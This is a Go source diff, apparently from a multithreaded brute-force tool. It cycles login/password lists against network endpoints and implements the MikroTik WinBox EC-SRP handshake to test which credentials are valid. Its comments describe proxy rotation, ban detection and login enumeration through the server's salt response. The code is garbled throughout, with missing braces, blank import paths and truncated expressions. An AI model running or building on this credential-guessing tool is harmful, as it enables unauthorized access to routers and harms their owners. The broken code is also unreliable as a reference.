CfgRegisterSwitch("add-empty-password", "insert an empty password to the password list")
//CfgRegisterSwitch("no-source-validation", "do not attempt to validate and count lines in source files")
CfgRegisterSwitch("no-password-trim", "preserve leading and trailing spaces in passwords")
CfgRegisterSwitch("logins-first", "increment logins before passwords")
CfgRegisterSwitch("file-contents-first", "try to go through source files first, defer commandline args for later")
//CfgRegisterSwitch("ignore-network-names", "always skip non-IPv4/non-IPv6 entries, do not attempt to resolve them as domain names")

@ -0,0 +1,285 @@
package main
import (
rbt ""
rbtUtils ""
// TaskEvent represents all events that can be issued on a Task.
type TaskEvent int
const (
TE_Generic TaskEvent = iota // undefined or no event
// These should terminate a task instantly.
TE_NoResponse // connect timed out
TE_ReadFailed // read failed or timed out
TE_NoService // endpoint does not provide selected service
TE_ProtocolError // a service module reported an error during auth attempt
TE_Bad // auth attempt completed successfully but credentials were wrong
TE_Good // auth attempt completed successfully and the credentials are correct
// TODO: proxying
TE_ProxyNoResponse // cannot connect to a proxy
TE_ProxyError // proxy failed during an exchange with the endpoint
TE_ProxyInvalidAuth // authenticated proxy rejected our credentials
// These serve as "hints" - they do not necessarily need to
// terminate a task, but they can still provide useful
// information about an endpoint or a service.
TH_NoSuchLogin // login in this task is not present or not valid on a service
TH_LoadExceeded // endpoint or service cannot handle this attempt rate
TH_Banned // got banned from a service, should try another proxy or wait out the delay
TH_WaitRequest // request for a grace time
// These are still hints, but they occur very frequently on a Task's normal lifecycle,
// effectively making these sort of "notifications" rather than hints.
TN_Connected // successfully connected to an endpoint
TN_ProxyConnected // successfully connected to a proxy
func (ev TaskEvent) String() string {
return [...]string{"Generic", "No response", "Read failed", "No Service", "Protocol error",
"Bad", "Good", "No response from Proxy", "Error from Proxy", "Invalid auth from Proxy",
"No Such login (hint)", "Load exceeded (hint)", "Banned (hint)", "Wait request (hint)",
"Connected (notify)", "Connected from Proxy (notify)"}[ev]
// A Task represents a single unit of workload.
// Every Task is linked to an Endpoint.
type Task struct {
e *Endpoint
login, password string
deferUntil time.Time
numDeferrals int
// this should not be in Task struct!
conn net.Conn
// ??? do we even need this here
good bool
// maxSafeThreads is a safeguard to prevent creation of too many threads at once.
const maxSafeThreads = 5000
// deferredTasks is a list of tasks that were deferred for processing to a later time.
// This usually happens due to connection errors, protocol errors or per-endpoint limits.
var deferredTasks *rbt.Tree
// taskMutex is a mutex for safe handling of RB tree.
var taskMutex sync.Mutex
// String returns a string representation of a Task.
func (task *Task) String() string {
if task == nil {
return "<empty task>"
} else {
return task.e.String() + "@" + task.login + ":" + task.password
// Defer sends a Task to the deferred queue.
func (task *Task) Defer(addTime time.Duration) {
task.deferUntil = time.Now().Add(addTime)
// tell the endpoint that we got deferred,
// so it won't be selected until the deferral time has passed
// task.e.SetDeferralTime(task.deferUntil)
// FIXME: this isn't needed, endpoints can handle their own delays
maxDeferrals := CfgGetInt("task-max-deferrals")
if maxDeferrals != -1 && task.numDeferrals >= maxDeferrals {
log("task", 5, "giving up on task \"%v\" because it has exhausted its deferral limit (%v)", task, maxDeferrals)
log("task", 5, "deferring task \"%v\" for %v", task, addTime)
defer taskMutex.Unlock()
deferredTasks.Put(task.deferUntil, task)
// EventWithParm tells a Task (and its underlying Endpoint) that
// something important has happened, or a hint has been acquired.
// Returns False if an event resulted in a deletion of its Task.
func (task *Task) EventWithParm(event TaskEvent, parm any) bool {
log("task", 4, "task event for \"%v\": %v", task, event)
if event == TE_Generic {
return true // do not process generic events
res := task.e.EventWithParm(event, parm) // notify the endpoint first
switch event {
// on these events, defer a Task only if its Endpoint is being kept
case TE_NoResponse:
if res {
case TE_ReadFailed:
if res {
case TE_ProtocolError:
if res {
// report about a bad/good auth result
case TE_Good:
RegisterResult(task, true)
case TE_Bad:
RegisterResult(task, false)
// wait request has occurred: stop processing and instantly wait on a thread
case TH_WaitRequest:
log("task", 4, "wait request for \"%v\": sleeping for %v", task, parm.(time.Duration))
return res
// Event is a parameterless version of EventWithParm.
func (task *Task) Event(event TaskEvent) bool {
return task.EventWithParm(event, 0)
// GetDeferredTask retrieves a Task from the deferred queue.
func GetDeferredTask() (task *Task, waitTime time.Duration) {
currentTime := time.Now()
if deferredTasks.Empty() {
log("task", 5, "deferred task list is empty")
return nil, 0
// check if a deferred task's endpoint is OK to fetch -
// sometimes, a task is OK to fetch but the endpoint was delayed by something else
it := deferredTasks.IteratorAt(deferredTasks.Left())
for {
k, v := it.Key().(time.Time), it.Value().(*Task)
if k.After(currentTime) {
log("task", 5, "deferred tasks cannot yet be processed at this time")
return nil, k.Sub(currentTime)
if k.Before(v.deferUntil) {
log("task", 5, "deferred task was re-deferred: removing its previous definition")
defer deferredTasks.Remove(k)
if !v.e.delayUntil.IsZero() && v.e.delayUntil.After(currentTime) {
// skip this task: deferred task is OK, but its endpoint is delayed
defer deferredTasks.Remove(k)
return v, 0
log("task", 5, "deferred tasks are OK for processing but their endpoints cannot yet be processed at this time")
return nil, 0
// FetchTaskComponents returns all components needed to build a Task.
func FetchTaskComponents() (ep *Endpoint, login string, password string, waitTime time.Duration) {
var empty bool
log("task", 5, "fetching new endpoint")
ep, waitTime = FetchEndpoint()
if ep == nil {
return nil, "", "", waitTime
log("task", 5, "fetched endpoint: \"%v\"", ep)
for {
log("task", 5, "fetching password for \"%v\"", ep)
password, empty = SrcPassword.FetchOne(&ep.passwordPos, true)
if !empty {
log("task", 5, "out of passwords for \"%v\": resetting and fetching new login", ep)
login, empty = SrcLogin.FetchOne(&ep.loginPos, true)
log("task", 5, "got password for \"%v\": %v, fetching login", ep, password)
login, empty = SrcLogin.FetchOne(&ep.loginPos, false)
if !empty {
log("task", 5, "got login for \"%v\": %v", ep, login)
return ep, login, password, 0
} else {
log("task", 5, "out of logins for \"%v\": exhausting endpoint", ep)
return FetchTaskComponents() // attempt to fetch again
// CreateTask creates a new Task element. It searches through deferred queue first,
// then, if nothing was found, it assembles a new (Endpoint, login, password) combination.
func CreateTask() (task *Task, delay time.Duration) {
defer taskMutex.Unlock()
task, delayDeferred := GetDeferredTask()
if task != nil {
log("task", 4, "new task (deferred): %v", task)
task.conn = nil
task.good = false
return task, 0
ep, login, password, delaySource := FetchTaskComponents()
if ep == nil {
if delayDeferred == 0 && delaySource == 0 {
log("task", 4, "cannot build task, no endpoint")
return nil, 0
} else if delayDeferred > delaySource || delayDeferred == 0 {
log("task", 4, "delaying task creation (by source delay) for %v", delaySource)
return nil, delaySource
} else {
log("task", 4, "delaying task creation (by deferred delay) for %v", delayDeferred)
return nil, delayDeferred
t := Task{}
t.e = ep
t.login = login
t.password = password
t.good = false
log("task", 4, "new task: %v", &t)
return &t, 0
func init() {
deferredTasks = rbt.NewWith(rbtUtils.TimeComparator)
CfgRegister("threads", 3, "how many threads to use")
CfgRegister("thread-delay-ms", 10, "separate threads at startup for this amount of ms")
CfgRegister("connect-timeout-ms", 3000, "")
CfgRegister("read-timeout-ms", 2000, "")
// using a very high limit for now, but this should actually be set to -1
CfgRegister("task-max-deferrals", 30000, "how many deferrals are allowed for a single task. -1 to disable")
CfgRegisterAlias("t", "threads")

@ -0,0 +1,112 @@
package main
import (
// threadWork processes a single work item for a thread.
func threadWork(dialer *net.Dialer) bool {
readTimeout := CfgGetDurationMS("read-timeout-ms")
task, delay := CreateTask()
if task == nil {
if delay > 0 {
log("thread", 3, "no endpoints available, sleeping for %v", delay)
return true
} else {
log("thread", 3, "no endpoints available, stopping thread loop")
return false
conn, err := dialer.Dial("tcp", task.e.String())
if err != nil {
log("thread", 2, "cannot connect to \"%v\": %v", task.e, err.Error())
return true
defer conn.Close()
task.conn = conn
conn.SetReadDeadline(time.Now().Add(readTimeout)) // should be just before Send() call...
log("thread", 2, "trying %v:%v on \"%v\"", task.login, task.password, task.e)
// TODO: multiple services (currently just WinBox)
res, err := TryLogin(task, conn)
if err != nil {
} else {
if res && err == nil {
task.EventWithParm(TE_Good, task.login)
} else {
task.EventWithParm(TE_Bad, task.login)
return true
// threadLoop calls threadWork in a loop, until the endpoints are exhausted,
// a pause/stop signal has been raised, or an exception has occurred in threadWork.
func threadLoop(dialer *net.Dialer) {
for threadWork(dialer) {
// TODO: pause/stop signal
// TODO: exception handling
// threadEntryPoint is the main entrypoint for a work thread.
func threadEntryPoint(c chan bool, threadIdx int, wg *sync.WaitGroup) {
log("thread", 3, "starting loop for thread %v", threadIdx)
connectTimeout := time.Duration(CfgGetInt("connect-timeout-ms")) * time.Millisecond
dialer := net.Dialer{Timeout: connectTimeout, KeepAlive: -1}
log("thread", 3, "exiting thread %v", threadIdx)
// InitializeThreads creates and starts up all threads.
func InitializeThreads() *sync.WaitGroup {
numThreads := CfgGetInt("threads")
failIf(numThreads > maxSafeThreads, "too many threads (max %v)", maxSafeThreads)
log("thread", 0, "initializing %v threads", numThreads)
c := make(chan bool)
var wg sync.WaitGroup
for i := 1; i <= numThreads; i++ {
go threadEntryPoint(c, i, &wg)
threadDelay := CfgGetDurationMS("thread-delay-ms")
log("thread", 0, "starting %v threads", numThreads)
for i := 1; i <= numThreads; i++ {
c <- true
if threadDelay > 0 {
log("thread", 0, "started")
return &wg
// WaitForThreads enters a wait state and keeps it until
// all threads have exited.
func WaitForThreads(wg *sync.WaitGroup) {
log("thread", 1, "waiting for threads")
log("thread", 1, "finished waiting for threads")

@ -0,0 +1,193 @@
package main
import (
type Winbox struct {
task *Task
conn net.Conn
stage int
user, pass string
w *WCurve
sa, xwa, xwb, j, z, secret, clientCC, serverCC, i, msg, resp []byte
xwaParity, xwbParity bool
func NewWinbox(task *Task, conn net.Conn) *Winbox {
winbox := Winbox{}
winbox.task = task
winbox.conn = conn
winbox.xwaParity = false
winbox.xwbParity = false
winbox.w = NewWCurve()
winbox.stage = -1
winbox.user = task.login
winbox.pass = task.password
return &winbox
func (winbox *Winbox) genSharedSecret(salt []byte) error {
winbox.i = genPasswordValidatorPriv(winbox.user, winbox.pass, salt)
xGamma, _ := winbox.w.genPublicKey(winbox.i)
v := winbox.w.redp1(xGamma, true)
wb := winbox.w.liftX(NewBigintFromBytes(winbox.xwb), winbox.xwbParity)
if wb == nil {
winbox.stage = -1
return errors.New("liftX failed")
wb = wb.Add(v)
xwaCombined := append(winbox.xwa, winbox.xwb...)
winbox.j = getSHA2Digest(xwaCombined)
pt := NewBigintFromBytes(winbox.i).Mul(NewBigintFromBytes(winbox.j))
pt = pt.Add(NewBigintFromBytes(
pt = winbox.w.finiteFieldValue(pt)
mp := wb.Mul(pt)
winbox.z, _ = winbox.w.toMontgomery(mp)
winbox.secret = getSHA2Digest(winbox.z)
return nil
func (winbox *Winbox) publicKeyExchange() {, _ = genRandomBytes(32)
winbox.xwa, winbox.xwaParity = winbox.w.genPublicKey(
lx := winbox.w.liftX(NewBigintFromBytes(winbox.xwa), winbox.xwaParity)
if lx == nil {
log("winbox", 1, "liftX failed in PKE")
winbox.stage = -1
if !winbox.w.check(lx) {
log("winbox", 1, "curve check failed")
winbox.stage = -1
winbox.msg = append([]byte(winbox.user), byte(0))
winbox.msg = append(winbox.msg, winbox.xwa...)
if winbox.xwaParity {
winbox.msg = append(winbox.msg, byte(1))
} else {
winbox.msg = append(winbox.msg, byte(0))
header := append([]byte{byte(len(winbox.msg))}, byte(6))
winbox.msg = append(header, winbox.msg...)
winbox.stage = 1
func (winbox *Winbox) confirmation() error {
if len(winbox.resp) <= 2 {
log("winbox", 1, "response size must be greater than 2 (got %v)", len(winbox.resp))
winbox.stage = -1
return errors.New("invalid response size")
respLen := winbox.resp[0]
winbox.resp = winbox.resp[2:]
if len(winbox.resp) != int(respLen) {
log("winbox", 1, "invalid challenge response size: got %v, expected %v", len(winbox.resp), respLen)
winbox.stage = -1
return errors.New("invalid challenge response size")
winbox.xwb = winbox.resp[:32]
if winbox.resp[32] == 0 {
winbox.xwbParity = false
} else {
winbox.xwbParity = true
salt := winbox.resp[33:]
if len(salt) != 16 {
// this means that there is no such login,
// or that its an old routeros version
log("winbox", 1, "invalid salt size: got %v, expected 16", len(salt))
// report this finding to endpoint manager
winbox.task.EventWithParm(TH_NoSuchLogin, winbox.user)
winbox.stage = -1
return nil // this is not a fatal error for an endpoint
err := winbox.genSharedSecret(salt)
if err != nil {
return err
winbox.j = getSHA2Digest(append(winbox.xwa, winbox.xwb...))
winbox.clientCC = getSHA2Digest(append(winbox.j, winbox.z...))
header := append([]byte{byte(len(winbox.clientCC))}, byte(6))
winbox.msg = append(header, winbox.clientCC...)
winbox.stage = 2
return nil
func (winbox *Winbox) sendAndRecv() error {
if len(winbox.msg) > 0 && winbox.conn != nil {
_, err := winbox.conn.Write(winbox.msg)
winbox.msg = []byte{}
if err != nil {
log("winbox", 1, "failed to send: %v", err.Error())
return err
winbox.resp = make([]byte, 1024)
n, err := winbox.conn.Read(winbox.resp)
if err != nil {
log("winbox", 1, "failed to recv: %v", err.Error())
return err
winbox.resp = winbox.resp[:n]
return nil
func (winbox *Winbox) TryLogin() (result bool, err error) {
log("winbox", 2, "login: stage 1, PKE")
log("winbox", 2, "login: stage 1, PKE OK, sending")
err = winbox.sendAndRecv()
if err != nil {
return false, err
log("winbox", 2, "login: stage 2, confirmation")
err = winbox.confirmation()
if err != nil {
return false, err
if winbox.stage == -1 { // confirmation failed but no error?
return false, nil // report that its a bad login
log("winbox", 2, "login: stage 2, confirmation OK, sending")
err = winbox.sendAndRecv()
if err != nil {
return false, err
log("winbox", 2, "login: stage 3")
a1 := append(winbox.j, winbox.clientCC...)
winbox.serverCC = getSHA2Digest(append(a1, winbox.z...))
return bytes.Equal(winbox.resp[2:], winbox.serverCC), nil